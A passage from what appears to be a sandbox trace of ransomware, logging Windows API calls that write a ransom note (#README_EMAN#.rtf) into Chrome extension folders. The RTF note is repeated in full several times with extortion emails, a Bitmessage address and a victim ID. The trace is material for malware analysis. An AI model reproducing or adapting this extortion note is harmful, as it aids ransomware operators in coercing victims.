\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.321] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.325] CloseHandle (hObject=0x294) returned 1 [0285.325] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0285.325] GetLastError () returned 0x2 [0285.325] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will 